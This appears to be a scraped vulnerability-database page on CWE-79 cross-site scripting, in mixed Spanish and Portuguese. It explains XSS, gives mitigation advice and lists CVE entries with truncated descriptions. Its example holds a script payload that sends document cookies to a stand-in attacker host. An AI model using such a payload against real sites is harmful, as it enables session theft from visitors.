Fallos del tipo CWE-79

28.611 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2018-0091—A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attackeEPSS 1.2%CVE-2017-12288—A vulnerability in the web-based management interface of Cisco Unified Contact Center Express could allow an unauthenticated, remote attackeEPSS 1.2%CVE-2020-15179HIGHHTML Injection in ScratchSigEPSS 1.2%CVE-2017-12296—A vulnerability in Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attacEPSS 1.2%CVE-2017-12298—A vulnerability in Cisco WebEx Meeting Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attackEPSS 1.2%CVE-2017-12265—A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, reEPSS 1.2%CVE-2023-36459CRITICALMastodon vulnerable to Cross-site Scripting through oEmbed preview cardsEPSS 1.2%CVE-2024-50857MEDIUMThe ip_do_job request in GestioIP v3.5.7 is vulnerable to Cross-Site Scripting (XSS). It allows data exfiltration and enables CSRF attacks. EPSS 1.2%CVE-2020-14492MEDIUMOpenClinic GAEPSS 1.2%CVE-2021-24964MEDIUMLiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSSEPSS 1.2%CVE-2026-48294HIGHAdobe Acrobat PDF Extension (Chrome) versions 26.5.2.2 and earlier are affected by a UXSS-class cross-origin data disclosure vulnerability. EPSS 1.2%CVE-2021-36873MEDIUMWordPress iQ Block Country plugin <= 1.2.11 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilityEPSS 1.2%CVE-2023-0942MEDIUMJapanized For WooCommerce <= 2.5.4 - Reflected Cross-Site ScriptingEPSS 1.2%CVE-2025-24752HIGHWordPress Essential Addons for Elementor plugin <= 6.0.14 - Reflected Cross Site Scripting (XSS) vulnerabilityEPSS 1.2%CVE-2023-49145HIGHApache NiFi: Improper Neutralization of Input in Advanced User Interface for JoltEPSS 1.2%CVE-2023-50378MEDIUMApache Ambari: Various XSS problemsEPSS 1.2%CVE-2022-1432HIGHCross-site Scripting (XSS) - Generic in octoprint/octoprintEPSS 1.2%CVE-2018-15463MEDIUMCisco Identity Services Engine Multiple Cross-Site Scripting VulnerabilitiesEPSS 1.2%CVE-2019-1670MEDIUMCisco Unified Intelligence Center Software Cross-Site Scripting VulnerabilityEPSS 1.2%CVE-2019-1685MEDIUMCisco Unity Connection Reflected Cross-Site Scripting VulnerabilityEPSS 1.2%